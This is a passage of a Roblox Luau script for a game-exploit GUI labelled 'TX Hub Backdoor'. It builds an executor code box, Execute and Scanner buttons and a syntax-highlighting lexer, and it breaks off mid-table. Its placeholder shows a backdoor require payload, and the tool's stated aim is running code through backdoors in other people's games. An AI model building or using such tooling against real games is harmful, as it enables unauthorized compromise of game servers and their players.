--			TTTTTTTTTTTTTTTTT  XXXXXX		XXXXXX	     000   TTTTTTTTTTTTTTTTT   XXXXXX	    XXXXXX		--
--			TTTTTTTTTTTTTTTTT	XXXXXX	   XXXXXX	     000   TTTTTTTTTTTTTTTTT	XXXXXX     XXXXXX		--
--				 TTTTTT			 XXXXXX   XXXXXX	     000		TTTTTT		     XXXXXX   XXXXXX		--
--				 TTTTTT			  XXXXXX XXXXXX          000		TTTTTT			  XXXXXX XXXXXX			--
--				 TTTTTT			   XXXXXXXXXXX		     000		TTTTTT			   XXXXXXXXXXX			--
-- 				 TTTTTT			  XXXXXX XXXXXX			 000		TTTTTT			  XXXXXX XXXXXX			--
--  			 TTTTTT			 XXXXXX   XXXXXX		 000		TTTTTT			 XXXXXX   XXXXXX		--
--	   			 TTTTTT			XXXXXX	   XXXXXX					TTTTTT			XXXXXX	   XXXXXX		--
--				 TTTTTT		   XXXXXX 		XXXXXX		 000		TTTTTT		   XXXXXX 		XXXXXX		--
--				 TTTTTT		  XXXXXX		 XXXXXX		 000		TTTTTT		  XXXXXX		 XXXXXX		--

local G2L={};G2L["1"] = Instance.new("ScreenGui", game:GetService("CoreGui"):WaitForChild("RobloxGui")); G2L["1"]["Name"] = math.random(math.random(0, 100000), math.random(100000, 100000000)); G2L["1"]["ResetOnSpawn"] = false; G2L["2"] = Instance.new("Frame", G2L["1"]); G2L["2"]["BorderSizePixel"] = 0; G2L["2"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0); G2L["2"]["Size"] = UDim2.new(0, 481, 0, 276); G2L["2"]["Position"] = UDim2.new(0.273, 0, 0.302, 0); G2L["2"]["BorderColor3"] = Color3.fromRGB(0, 0, 0); G2L["3"] = Instance.new("UICorner", G2L["2"]); G2L["4"] = Instance.new("UIStroke", G2L["2"]); G2L["4"]["Thickness"] = 2.5; G2L["4"]["Color"] = Color3.fromRGB(210, 210, 210); G2L["5"] = Instance.new("UIGradient", G2L["4"]); G2L["5"]["Color"] = ColorSequence.new{ColorSequenceKeypoint.new(0.000, Color3.fromRGB(129, 255, 0)),ColorSequenceKeypoint.new(0.375, Color3.fromRGB(86, 255, 0)),ColorSequenceKeypoint.new(0.747, Color3.fromRGB(44, 127, 2)),ColorSequenceKeypoint.new(1.000, Color3.fromRGB(46, 125, 0))}; G2L["6"] = Instance.new("Folder", G2L["2"]); G2L["6"]["Name"] = [[Executor]]; G2L["7"] = Instance.new("Frame", G2L["6"]); G2L["7"]["BackgroundColor3"] = Color3.fromRGB(16, 16, 16); G2L["7"]["Size"] = UDim2.new(0, 341, 0, 182); G2L["7"]["Position"] = UDim2.new(0.01963, 0, 0.18478, 0); G2L["7"]["Name"] = [[ExecutorBox]]; G2L["8"] = Instance.new("UICorner", G2L["7"]); G2L["9"] = Instance.new("TextBox", G2L["7"]); G2L["9"]["CursorPosition"] = -1; G2L["9"]["TextXAlignment"] = Enum.TextXAlignment.Left; G2L["9"]["TextWrapped"] = true; G2L["9"]["TextTransparency"] = 0.5; G2L["9"]["TextSize"] = 16; G2L["9"]["TextColor3"] = Color3.fromRGB(255, 255, 255); G2L["9"]["TextYAlignment"] = Enum.TextYAlignment.Top; G2L["9"]["BackgroundColor3"] = Color3.fromRGB(13, 13, 13); G2L["9"]["FontFace"] = Font.new([[rbxasset://fonts/families/Inconsolata.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["9"]["MultiLine"] = true; G2L["9"]["ClearTextOnFocus"] = false; G2L["9"]["PlaceholderText"] = [[require(6666666).load("Asshole")]]; G2L["9"]["Size"] = UDim2.new(0.993, 0, 0.96018, 0); G2L["9"]["Position"] = UDim2.new(0.00701, 0, 0.00007, 0); G2L["9"]["Text"] = [[]]; G2L["9"]["BackgroundTransparency"] = 1; G2L["a"] = Instance.new("Folder", G2L["9"]); G2L["a"]["Name"] = [[SyntaxHighlights]]; G2L["b"] = Instance.new("LocalScript", G2L["9"]); G2L["b"]["Name"] = [[Highlight]]; G2L["c"] = Instance.new("ModuleScript", G2L["b"]); G2L["c"]["Name"] = [[Highlighter]]; G2L["d"] = Instance.new("ModuleScript", G2L["c"]); G2L["d"]["Name"] = [[lexer]]; G2L["e"] = Instance.new("ModuleScript", G2L["d"]); G2L["e"]["Name"] = [[language]]; G2L["f"] = Instance.new("LocalScript", G2L["9"]); G2L["f"]["Name"] = [[AutoComplete]]; G2L["10"] = Instance.new("ScrollingFrame", G2L["9"]); G2L["10"]["ZIndex"] = 100; G2L["10"]["Name"] = [[AutocompleteMenu]]; G2L["10"]["BackgroundColor3"] = Color3.fromRGB(13, 13, 13); G2L["10"]["Size"] = UDim2.new(0.353, 0, 0.32242, 160); G2L["10"]["Position"] = UDim2.new(1.01886, 0, -0.01151, 2); G2L["10"]["BorderColor3"] = Color3.fromRGB(13, 13, 13); G2L["10"]["ScrollBarThickness"] = 0; G2L["11"] = Instance.new("UIListLayout", G2L["10"]); G2L["11"]["SortOrder"] = Enum.SortOrder.LayoutOrder; G2L["12"] = Instance.new("Frame", G2L["6"]); G2L["12"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0); G2L["12"]["Size"] = UDim2.new(0, 290, 0, 28); G2L["12"]["Position"] = UDim2.new(0.0217, 0, 0.87081, 0); G2L["12"]["Name"] = [[Execute]]; G2L["12"]["BackgroundTransparency"] = 1; G2L["13"] = Instance.new("TextButton", G2L["12"]); G2L["13"]["TextSize"] = 22; G2L["13"]["TextColor3"] = Color3.fromRGB(0, 0, 0); G2L["13"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["13"]["FontFace"] = Font.new([[rbxasset://fonts/families/Michroma.json]], Enum.FontWeight.Bold, Enum.FontStyle.Normal); G2L["13"]["BackgroundTransparency"] = 1; G2L["13"]["Size"] = UDim2.new(0.7, 0, 1, 0); G2L["13"]["Text"] = [[Execute]]; G2L["13"]["Name"] = [[Button]]; G2L["14"] = Instance.new("UIStroke", G2L["13"]); G2L["14"]["Thickness"] = 1.5; G2L["14"]["Color"] = Color3.fromRGB(210, 210, 210); G2L["15"] = Instance.new("UIGradient", G2L["14"]); G2L["15"]["Color"] = ColorSequence.new{ColorSequenceKeypoint.new(0.000, Color3.fromRGB(129, 255, 0)),ColorSequenceKeypoint.new(0.375, Color3.fromRGB(86, 255, 0)),ColorSequenceKeypoint.new(0.747, Color3.fromRGB(44, 127, 2)),ColorSequenceKeypoint.new(1.000, Color3.fromRGB(46, 125, 0))}; G2L["16"] = Instance.new("UIStroke", G2L["13"]); G2L["16"]["Thickness"] = 2.5; G2L["16"]["Color"] = Color3.fromRGB(210, 210, 210); G2L["16"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border; G2L["17"] = Instance.new("UIGradient", G2L["16"]); G2L["17"]["Color"] = ColorSequence.new{ColorSequenceKeypoint.new(0.000, Color3.fromRGB(129, 255, 0)),ColorSequenceKeypoint.new(0.375, Color3.fromRGB(86, 255, 0)),ColorSequenceKeypoint.new(0.747, Color3.fromRGB(44, 127, 2)),ColorSequenceKeypoint.new(1.000, Color3.fromRGB(46, 125, 0))}; G2L["18"] = Instance.new("UICorner", G2L["13"]); G2L["19"] = Instance.new("Frame", G2L["6"]); G2L["19"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0); G2L["19"]["Size"] = UDim2.new(0, 162, 0, 28); G2L["19"]["Position"] = UDim2.new(0.64006, 0, 0.87081, 0); G2L["19"]["Name"] = [[Clear]]; G2L["19"]["BackgroundTransparency"] = 1; G2L["1a"] = Instance.new("TextButton", G2L["19"]); G2L["1a"]["TextSize"] = 22; G2L["1a"]["TextColor3"] = Color3.fromRGB(0, 0, 0); G2L["1a"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["1a"]["FontFace"] = Font.new([[rbxasset://fonts/families/Michroma.json]], Enum.FontWeight.Bold, Enum.FontStyle.Normal); G2L["1a"]["BackgroundTransparency"] = 1; G2L["1a"]["Size"] = UDim2.new(0.78132, 0, 1, 0); G2L["1a"]["Text"] = [[Clear]]; G2L["1a"]["Name"] = [[Button]]; G2L["1a"]["Position"] = UDim2.new(-0.51852, 0, -0.03571, 0); G2L["1b"] = Instance.new("UIStroke", G2L["1a"]); G2L["1b"]["Thickness"] = 2.5; G2L["1b"]["Color"] = Color3.fromRGB(210, 210, 210); G2L["1b"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border; G2L["1c"] = Instance.new("UIGradient", G2L["1b"]); G2L["1c"]["Color"] = ColorSequence.new{ColorSequenceKeypoint.new(0.000, Color3.fromRGB(129, 255, 0)),ColorSequenceKeypoint.new(0.375, Color3.fromRGB(86, 255, 0)),ColorSequenceKeypoint.new(0.747, Color3.fromRGB(44, 127, 2)),ColorSequenceKeypoint.new(1.000, Color3.fromRGB(46, 125, 0))}; G2L["1d"] = Instance.new("UIStroke", G2L["1a"]); G2L["1d"]["Thickness"] = 1.5; G2L["1d"]["Color"] = Color3.fromRGB(210, 210, 210); G2L["1e"] = Instance.new("UIGradient", G2L["1d"]); G2L["1e"]["Color"] = ColorSequence.new{ColorSequenceKeypoint.new(0.000, Color3.fromRGB(129, 255, 0)),ColorSequenceKeypoint.new(0.375, Color3.fromRGB(86, 255, 0)),ColorSequenceKeypoint.new(0.747, Color3.fromRGB(44, 127, 2)),ColorSequenceKeypoint.new(1.000, Color3.fromRGB(46, 125, 0))}; G2L["1f"] = Instance.new("UICorner", G2L["1a"]); G2L["20"] = Instance.new("Frame", G2L["2"]); G2L["20"]["Visible"] = false; G2L["20"]["BorderSizePixel"] = 0; G2L["20"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0); G2L["20"]["Size"] = UDim2.new(0, 482, 0, 276); G2L["20"]["Position"] = UDim2.new(-0.00057, 0, -0.00212, 0); G2L["20"]["BorderColor3"] = Color3.fromRGB(0, 0, 0); G2L["20"]["Name"] = [[Scanner]]; G2L["21"] = Instance.new("UICorner", G2L["20"]); G2L["22"] = Instance.new("UIStroke", G2L["20"]); G2L["22"]["Thickness"] = 2.5; G2L["22"]["Color"] = Color3.fromRGB(210, 210, 210); G2L["23"] = Instance.new("UIGradient", G2L["22"]); G2L["23"]["Color"] = ColorSequence.new{ColorSequenceKeypoint.new(0.000, Color3.fromRGB(129, 255, 0)),ColorSequenceKeypoint.new(0.375, Color3.fromRGB(86, 255, 0)),ColorSequenceKeypoint.new(0.747, Color3.fromRGB(44, 127, 2)),ColorSequenceKeypoint.new(1.000, Color3.fromRGB(46, 125, 0))}; G2L["24"] = Instance.new("TextButton", G2L["20"]); G2L["24"]["TextSize"] = 57; G2L["24"]["TextColor3"] = Color3.fromRGB(0, 0, 0); G2L["24"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["24"]["FontFace"] = Font.new([[rbxasset://fonts/families/Michroma.json]], Enum.FontWeight.Bold, Enum.FontStyle.Normal); G2L["24"]["BackgroundTransparency"] = 1; G2L["24"]["Size"] = UDim2.new(0.83633, 0, 0.42361, 0); G2L["24"]["Text"] = [[Start Scanner]]; G2L["24"]["Name"] = [[Button]]; G2L["24"]["Position"] = UDim2.new(0.07914, 0, 0.43197, 0); G2L["25"] = Instance.new("UIStroke", G2L["24"]); G2L["25"]["Thickness"] = 2.5; G2L["25"]["Color"] = Color3.fromRGB(210, 210, 210); G2L["25"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border; G2L["26"] = Instance.new("UIGradient", G2L["25"]); G2L["26"]["Color"] = ColorSequence.new{ColorSequenceKeypoint.new(0.000, Color3.fromRGB(129, 255, 0)),ColorSequenceKeypoint.new(0.375, Color3.fromRGB(86, 255, 0)),ColorSequenceKeypoint.new(0.747, Color3.fromRGB(44, 127, 2)),ColorSequenceKeypoint.new(1.000, Color3.fromRGB(46, 125, 0))}; G2L["27"] = Instance.new("UICorner", G2L["24"]); G2L["28"] = Instance.new("UIStroke", G2L["24"]); G2L["28"]["Thickness"] = 2.5; G2L["28"]["Color"] = Color3.fromRGB(210, 210, 210); G2L["29"] = Instance.new("UIGradient", G2L["28"]); G2L["29"]["Color"] = ColorSequence.new{ColorSequenceKeypoint.new(0.000, Color3.fromRGB(129, 255, 0)),ColorSequenceKeypoint.new(0.375, Color3.fromRGB(86, 255, 0)),ColorSequenceKeypoint.new(0.747, Color3.fromRGB(44, 127, 2)),ColorSequenceKeypoint.new(1.000, Color3.fromRGB(46, 125, 0))}; G2L["2a"] = Instance.new("TextLabel", G2L["2"]); G2L["2a"]["TextSize"] = 57; G2L["2a"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["2a"]["FontFace"] = Font.new([[rbxasset://fonts/families/Michroma.json]], Enum.FontWeight.Bold, Enum.FontStyle.Normal); G2L["2a"]["TextColor3"] = Color3.fromRGB(0, 0, 0); G2L["2a"]["BackgroundTransparency"] = 1; G2L["2a"]["Size"] = UDim2.new(0, 457, 0, 57); G2L["2a"]["Text"] = [[TX Hub Backdoor]]; G2L["2a"]["Position"] = UDim2.new(0.02378, 0, -0.02174, 0); G2L["2b"] = Instance.new("UIStroke", G2L["2a"]); G2L["2b"]["Thickness"] = 2.5; G2L["2b"]["Color"] = Color3.fromRGB(210, 210, 210); G2L["2c"] = Instance.new("UIGradient", G2L["2b"]); G2L["2c"]["Color"] = ColorSequence.new{ColorSequenceKeypoint.new(0.000, Color3.fromRGB(129, 255, 0)),ColorSequenceKeypoint.new(0.375, Color3.fromRGB(86, 255, 0)),ColorSequenceKeypoint.new(0.747, Color3.fromRGB(44, 127, 2)),ColorSequenceKeypoint.new(1.000, Color3.fromRGB(46, 125, 0))}; G2L["2d"] = Instance.new("UICorner", G2L["2a"]); G2L["2e"] = Instance.new("LocalScript", G2L["1"]);  local G2L_REQUIRE = require; local G2L_MODULES = {}; local function require(Module:ModuleScript)     local ModuleState = G2L_MODULES[Module];     if ModuleState then         if not ModuleState.Required then             ModuleState.Required = true;             ModuleState.Value = ModuleState.Closure();         end         return ModuleState.Value;     end;     return G2L_REQUIRE(Module); end  G2L_MODULES[G2L["c"]] = { Closure = function()     local script = G2L["c"];local script = script local function SanitizeRichText(s: string): string return string.gsub( string.gsub(string.gsub(string.gsub(string.gsub(s, "&", "&amp;"), "<", "&lt;"), ">", "&gt;"), '"', "&quot;"), "'", "&apos;" ) end  local function SanitizeTabs(s: string): string return string.gsub(s, "\t", "    ") end  local function SanitizeControl(s: string): string return string.gsub(s, "[\0\1\2\3\4\5\6\7\8\11\12\13\14\15\16\17\18\19\20\21\22\23\24\25\26\27\28\29\30\31]+", "") end  local TokenColors: HighlighterColors = { ["background"] = Color3.fromRGB(47, 47, 47), ["iden"] = Color3.fromRGB(234, 234, 234), ["keyword"] = Color3.fromRGB(215, 174, 255), ["builtin"] = Color3.fromRGB(131, 206, 255), ["string"] = Color3.fromRGB(196, 255, 193), ["number"] = Color3.fromRGB(255, 125, 125), ["comment"] = Color3.fromRGB(140, 140, 155), ["operator"] = Color3.fromRGB(255, 239, 148), ["custom"] = Color3.fromRGB(119, 122, 255), } local ColorFormatter: { [Color3]: string } = {} local LastData: { [TextObject]: ObjectData } = {} local Cleanups: { [TextObject]: () -> () } = {}  local Highlighter = { defaultLexer = require(script.lexer), }  function Highlighter.highlight(props: HighlightProps) local textObject = props.textObject local src = SanitizeTabs(SanitizeControl(props.src or textObject.Text)) local lexer = props.lexer or Highlighter.defaultLexer local customLang = props.customLang local forceUpdate = props.forceUpdate local data = LastData[textObject] if data == nil then data = { Text = "", Labels = {}, Lines = {}, Lexer = lexer, CustomLang = customLang, } LastData[textObject] = data elseif forceUpdate ~= true and data.Text == src then return end  local lineLabels = data.Labels local previousLines = data.Lines  local lines = string.split(src, "\n")  data.Lines = lines data.Text = src data.Lexer = lexer data.CustomLang = customLang textObject.RichText = false textObject.Text = src textObject.TextXAlignment = Enum.TextXAlignment.Left textObject.TextYAlignment = Enum.TextYAlignment.Top textObject.BackgroundColor3 = TokenColors.background textObject.TextColor3 = TokenColors.iden textObject.TextTransparency = 0.5 local lineFolder = textObject:FindFirstChild("SyntaxHighlights") if lineFolder == nil then local newLineFolder = Instance.new("Folder") newLineFolder.Name = "SyntaxHighlights" newLineFolder.Parent = textObject  lineFolder = newLineFolder end local cleanup = Cleanups[textObject] if not cleanup then local connections: { RBXScriptConnection } = {} local function newCleanup() for _, label in ipairs(lineLabels) do label:Destroy() end table.clear(lineLabels) lineLabels = nil  LastData[textObject] = nil Cleanups[textObject] = nil  for _, connection in connections do connection:Disconnect() end table.clear(connections) connections = nil end Cleanups[textObject] = newCleanup cleanup = newCleanup  table.insert( connections, textObject.AncestryChanged:Connect(function() if textObject.Parent then return end  cleanup() end) ) table.insert( connections, textObject:GetPropertyChangedSignal("TextBounds"):Connect(function() Highlighter.highlight({ textObject = textObject, forceUpdate = true, lexer = lexer, customLang = customLang, }) end) ) table.insert( connections, textObject:GetPropertyChangedSignal("Text"):Connect(function() Highlighter.highlight({ textObject = textObject, lexer = lexer, customLang = customLang, }) end) ) table.insert( connections, textObject:GetPropertyChangedSignal("AbsoluteSize"):Connect(function() Highlighter.highlight({ textObject = textObject, forceUpdate = true, lexer = lexer, customLang = customLang, }) end) ) end if src == "" then for l=1, #lineLabels do if lineLabels[l].Text == "" then continue end lineLabels[l].Text = "" end return cleanup end local textBounds = textObject.TextBounds while (textBounds.Y ~= textBounds.Y) or (textBounds.Y < 1) do task.wait() textBounds = textObject.TextBounds end  if LastData[textObject] == nil then return cleanup end  local numLines = #lines local textHeight = textBounds.Y / numLines * textObject.LineHeight  local richText, index, lineNumber = table.create(5), 0, 1 for token: string, content: string in lexer.scan(src) do local Color = if customLang and customLang[content] then TokenColors["custom"] else TokenColors[token] or TokenColors["iden"]  local tokenLines = string.split(SanitizeRichText(content), "\n")  for l, line in ipairs(tokenLines) do local lineLabel = lineLabels[lineNumber] if not lineLabel then local newLabel = Instance.new("TextLabel") newLabel.Name = "Line_" .. lineNumber newLabel.RichText = true newLabel.BackgroundTransparency = 1 newLabel.Text = "" newLabel.TextXAlignment = Enum.TextXAlignment.Left newLabel.TextYAlignment = Enum.TextYAlignment.Top newLabel.Parent = lineFolder newLabel.TextWrapped=true lineLabels[lineNumber] = newLabel lineLabel = newLabel end lineLabel.TextColor3 = TokenColors["iden"] lineLabel.Font = textObject.Font lineLabel.TextSize = textObject.TextSize lineLabel.Size = UDim2.new(1, 0, 0, math.ceil(textHeight)) lineLabel.Position = UDim2.fromScale(0, textHeight * (lineNumber - 1) / textObject.AbsoluteSize.Y) if l > 1 then if forceUpdate or lines[lineNumber] ~= previousLines[lineNumber] then lineLabels[lineNumber].Text = table.concat(richText) end lineNumber += 1 index = 0 table.clear(richText) end if forceUpdate or lines[lineNumber] ~= previousLines[lineNumber] then index += 1 if Color ~= TokenColors["iden"] and string.find(line, "[%S%C]") then richText[index] = string.format(ColorFormatter[Color], line) else richText[index] = line end end end end if richText[1] and lineLabels[lineNumber] then lineLabels[lineNumber].Text = table.concat(richText) end for l=lineNumber+1, #lineLabels do if lineLabels[l].Text == "" then continue end lineLabels[l].Text = "" end  return cleanup end  function Highlighter.refresh(): () for textObject, data in pairs(LastData) do for _, lineLabel in ipairs(data.Labels) do lineLabel.TextColor3 = TokenColors["iden"] end  Highlighter.highlight({ textObject = textObject, forceUpdate = true, src = data.Text, lexer = data.Lexer, customLang = data.CustomLang, }) end end  function Highlighter.setTokenColors(colors: HighlighterColors) for token, color in colors do TokenColors[token] = color ColorFormatter[color] = string.format( '<font color="#%.2x%.2x%.2x">', color.R * 255, color.G * 255, color.B * 255 ) .. "%s</font>" end  Highlighter.refresh() end Highlighter.setTokenColors(TokenColors)  return Highlighter end; }; G2L_MODULES[G2L["d"]] = { Closure = function()     local script = G2L["d"];local script = script local lexer = {}  local Prefix, Suffix, Cleaner = "^[%c%s]*", "[%c%s]*", "[%c%s]+" local UNICODE = "[%z\x01-\x7F\xC2-\xF4][\x80-\xBF]+" local NUMBER_A = "0[xX][%da-fA-F_]+" local NUMBER_B = "0[bB][01_]+" local NUMBER_C = "%d+%.?%d*[eE][%+%-]?%d+" local NUMBER_D = "%d+[%._]?[%d_eE]*" local OPERATORS = "[:;<>/~%*%(%)%-={},%.#%^%+%%]+" local BRACKETS = "[%[%]]+" local IDEN = "[%a_][%w_]*" local STRING_EMPTY = "(['\"])%1" local STRING_PLAIN = "(['\"])[^\n]-([^\\]%1)" local STRING_INTER = "`[^\n]-`" local STRING_INCOMP_A = "(['\"]).-\n" local STRING_INCOMP_B = "(['\"])[^\n]*" local STRING_MULTI = "%[(=*)%[.-%]%1%]" local STRING_MULTI_INCOMP = "%[=*%[.-.*" local COMMENT_MULTI = "%-%-%[(=*)%[.-%]%1%]" local COMMENT_MULTI_INCOMP = "%-%-%[=*%[.-.*" local COMMENT_PLAIN = "%-%-.-\n" local COMMENT_INCOMP = "%-%-.*"  local lang = require(script.language) local lua_keyword = lang.keyword local lua_builtin = lang.builtin local lua_libraries = lang.libraries  lexer.language = lang  local lua_matches = { { Prefix .. IDEN .. Suffix, "var" },  { Prefix .. NUMBER_A .. Suffix, "number" }, { Prefix .. NUMBER_B .. Suffix, "number" }, { Prefix .. NUMBER_C .. Suffix, "number" }, { Prefix .. NUMBER_D .. Suffix, "number" },  { Prefix .. STRING_EMPTY .. Suffix, "string" }, { Prefix .. STRING_PLAIN .. Suffix, "string" }, { Prefix .. STRING_INCOMP_A .. Suffix, "string" }, { Prefix .. STRING_INCOMP_B .. Suffix, "string" }, { Prefix .. STRING_MULTI .. Suffix, "string" }, { Prefix .. STRING_MULTI_INCOMP .. Suffix, "string" }, { Prefix .. STRING_INTER .. Suffix, "string_inter" },  { Prefix .. COMMENT_MULTI .. Suffix, "comment" }, { Prefix .. COMMENT_MULTI_INCOMP .. Suffix, "comment" }, { Prefix .. COMMENT_PLAIN .. Suffix, "comment" }, { Prefix .. COMMENT_INCOMP .. Suffix, "comment" },  { Prefix .. OPERATORS .. Suffix, "operator" }, { Prefix .. BRACKETS .. Suffix, "operator" },  { Prefix .. UNICODE .. Suffix, "iden" },  { "^.", "iden" }, }  local PATTERNS, TOKENS = {}, {} for i, m in lua_matches do PATTERNS[i] = m[1] TOKENS[i] = m[2] end function lexer.scan(s: string) local index = 1 local size = #s local previousContent1, previousContent2, previousContent3, previousToken = "", "", "", ""  local thread = coroutine.create(function() while index <= size do local matched = false for tokenType, pattern in ipairs(PATTERNS) do local start, finish = string.find(s, pattern, index) if start == nil then continue end index = finish + 1 matched = true local content = string.sub(s, start, finish) local rawToken = TOKENS[tokenType] local processedToken = rawToken if rawToken == "var" then local cleanContent = string.gsub(content, Cleaner, "")  if lua_keyword[cleanContent] then processedToken = "keyword" elseif lua_builtin[cleanContent] then processedToken = "builtin" elseif string.find(previousContent1, "%.[%s%c]*$") and previousToken ~= "comment" then local parent = string.gsub(previousContent2, Cleaner, "") local lib = lua_libraries[parent] if lib and lib[cleanContent] and not string.find(previousContent3, "%.[%s%c]*$") then processedToken = "builtin" else processedToken = "iden" end else processedToken = "iden" end elseif rawToken == "string_inter" then if not string.find(content, "[^\\]{") then processedToken = "string" else processedToken = nil  local isString = true local subIndex = 1 local subSize = #content while subIndex <= subSize do local subStart, subFinish = string.find(content, "^.-[^\\][{}]", subIndex) if subStart == nil then coroutine.yield("string", string.sub(content, subIndex)) break end  if isString then subIndex = subFinish + 1 coroutine.yield("string", string.sub(content, subStart, subFinish)) isString = false else subIndex = subFinish local subContent = string.sub(content, subStart, subFinish-1) for innerToken, innerContent in lexer.scan(subContent) do coroutine.yield(innerToken, innerContent) end isString = true end end end end previousContent3 = previousContent2 previousContent2 = previousContent1 previousContent1 = content previousToken = processedToken or rawToken if processedToken then coroutine.yield(processedToken, content) end break end if not matched then return end end return end)  return function() if coroutine.status(thread) == "dead" then return end  local success, token, content = coroutine.resume(thread) if success and token then return token, content end  return end end  function lexer.navigator() local nav = { Source = "", TokenCache = table.create(50),  _RealIndex = 0, _UserIndex = 0, _ScanThread = nil, }  function nav:Destroy() self.Source = nil self._RealIndex = nil self._UserIndex = nil self.TokenCache = nil self._ScanThread = nil end  function nav:SetSource(SourceString) self.Source = SourceString  self._RealIndex = 0 self._UserIndex = 0 table.clear(self.TokenCache)  self._ScanThread = coroutine.create(function() for Token, Src in lexer.scan(self.Source) do self._RealIndex += 1 self.TokenCache[self._RealIndex] = { Token, Src } coroutine.yield(Token, Src) end end) end  function nav.Next() nav._UserIndex += 1  if nav._RealIndex >= nav._UserIndex then return table.unpack(nav.TokenCache[nav._UserIndex]) else if coroutine.status(nav._ScanThread) == "dead" then return else local success, token, src = coroutine.resume(nav._ScanThread) if success and token then return token, src else return end end end end  function nav.Peek(PeekAmount) local GoalIndex = nav._UserIndex + PeekAmount  if nav._RealIndex >= GoalIndex then if GoalIndex > 0 then return table.unpack(nav.TokenCache[GoalIndex]) else return end else if coroutine.status(nav._ScanThread) == "dead" then return else local IterationsAway = GoalIndex - nav._RealIndex  local success, token, src = nil, nil, nil  for _ = 1, IterationsAway do success, token, src = coroutine.resume(nav._ScanThread) if not (success or token) then break end end  return token, src end end end  return nav end  return lexer end; }; G2L_MODULES[G2L["e"]] = { Closure = function()     local script = G2L["e"];local script = script local language = { keyword = { ["and"] = "keyword", ["break"] = "keyword", ["continue"] = "keyword", ["do"] = "keyword", ["else"] = "keyword", ["elseif"] = "keyword", ["end"] = "keyword", ["export"] = "keyword", ["false"] = "keyword", ["for"] = "keyword", ["function"] = "keyword", ["if"] = "keyword", ["in"] = "keyword", ["local"] = "keyword", ["nil"] = "keyword", ["not"] = "keyword", ["or"] = "keyword", ["repeat"] = "keyword", ["return"] = "keyword", ["self"] = "keyword", ["then"] = "keyword", ["true"] = "keyword", ["type"] = "keyword", ["typeof"] = "keyword", ["until"] = "keyword", ["while"] = "keyword", },  builtin = { ["assert"] = "function", ["error"] = "function", ["getfenv"] = "function", ["getmetatable"] = "function", ["ipairs"] = "function", ["loadstring"] = "function", ["newproxy"] = "function", ["next"] = "function", ["pairs"] = "function", ["pcall"] = "function", ["print"] = "function", ["rawequal"] = "function", ["rawget"] = "function", ["rawlen"] = "function", ["rawset"] = "function", ["select"] = "function", ["setfenv"] = "function", ["setmetatable"] = "function", ["tonumber"] = "function", ["tostring"] = "function", ["unpack"] = "function", ["xpcall"] = "function", ["collectgarbage"] = "function", ["_G"] = "table", ["_VERSION"] = "string", ["bit32"] = "table", ["coroutine"] = "table", ["debug"] = "table", ["math"] = "table", ["os"] = "table", ["string"] = "table", ["table"] = "table", ["utf8"] = "table", ["DebuggerManager"] = "function", ["delay"] = "function", ["gcinfo"] = "function", ["PluginManager"] = "function", ["require"] = "function", ["settings"] = "function", ["spawn"] = "function", ["tick"] = "function", ["time"] = "function", ["UserSettings"] = "function", ["wait"] = "function", ["warn"] = "function", ["Delay"] = "function", ["ElapsedTime"] = "function", ["elapsedTime"] = "function", ["printidentity"] = "function", ["Spawn"] = "function", ["Stats"] = "function", ["stats"] = "function", ["Version"] = "function", ["version"] = "function", ["Wait"] = "function", ["ypcall"] = "function", ["game"] = "Instance", ["plugin"] = "Instance", ["script"] = "Instance", ["shared"] = "Instance", ["workspace"] = "Instance", ["Game"] = "Instance", ["Workspace"] = "Instance", ["Axes"] = "table", ["BrickColor"] = "table", ["CatalogSearchParams"] = "table", ["CFrame"] = "table", ["Color3"] = "table", ["ColorSequence"] = "table", ["ColorSequenceKeypoint"] = "table", ["DateTime"] = "table", ["DockWidgetPluginGuiInfo"] = "table", ["Enum"] = "table", ["Faces"] = "table", ["FloatCurveKey"] = "table", ["Font"] = "table", ["Instance"] = "table", ["NumberRange"] = "table", ["NumberSequence"] = "table", ["NumberSequenceKeypoint"] = "table", ["OverlapParams"] = "table", ["PathWaypoint"] = "table", ["PhysicalProperties"] = "table", ["Random"] = "table", ["Ray"] = "table", ["RaycastParams"] = "table", ["Rect"] = "table", ["Region3"] = "table", ["Region3int16"] = "table", ["RotationCurveKey"] = "table", ["task"] = "table", ["TweenInfo"] = "table", ["UDim"] = "table", ["UDim2"] = "table", ["Vector2"] = "table", ["Vector2int16"] = "table", ["Vector3"] = "table", ["Vector3int16"] = "table", },  libraries = { bit32 = { arshift = "function", band = "function", bnot = "function", bor = "function", btest = "function", bxor = "function", countlz = "function", countrz = "function", extract = "function", lrotate = "function", lshift = "function", replace = "function", rrotate = "function", rshift = "function", },  coroutine = { close = "function", create = "function", isyieldable = "function", resume = "function", running = "function", status = "function", wrap = "function", yield = "function", },  debug = { dumpheap = "function", info = "function", loadmodule = "function", profilebegin = "function", profileend = "function", resetmemorycategory = "function", setmemorycategory = "function", traceback = "function", },  math = { abs = "function", acos = "function", asin = "function", atan2 = "function", atan = "function", ceil = "function", clamp = "function", cos = "function", cosh = "function", deg = "function", exp = "function", floor = "function", fmod = "function", frexp = "function", ldexp = "function", log10 = "function", log = "function", max = "function", min = "function", modf = "function", noise = "function", pow = "function", rad = "function", random = "function", randomseed = "function", round = "function", sign = "function", sin = "function", sinh = "function", sqrt = "function", tan = "function", tanh = "function",  huge = "number", pi = "number", },  os = { clock = "function", date = "function", difftime = "function", time = "function", },  string = { byte = "function", char = "function", find = "function", format = "function", gmatch = "function", gsub = "function", len = "function", lower = "function", match = "function", pack = "function", packsize = "function", rep = "function", reverse = "function", split = "function", sub = "function", unpack = "function", upper = "function", },  table = { clear = "function", clone = "function", concat = "function", create = "function", find = "function", foreach = "function", foreachi = "function", freeze = "function", getn = "function", insert = "function", isfrozen = "function", maxn = "function", move = "function", pack = "function", remove = "function", sort = "function", unpack = "function", },  utf8 = { char = "function", codepoint = "function", codes = "function", graphemes = "function", len = "function", nfcnormalize = "function", nfdnormalize = "function", offset = "function",  charpattern = "string", }, Axes = { new = "function", },  BrickColor = { Black = "function", 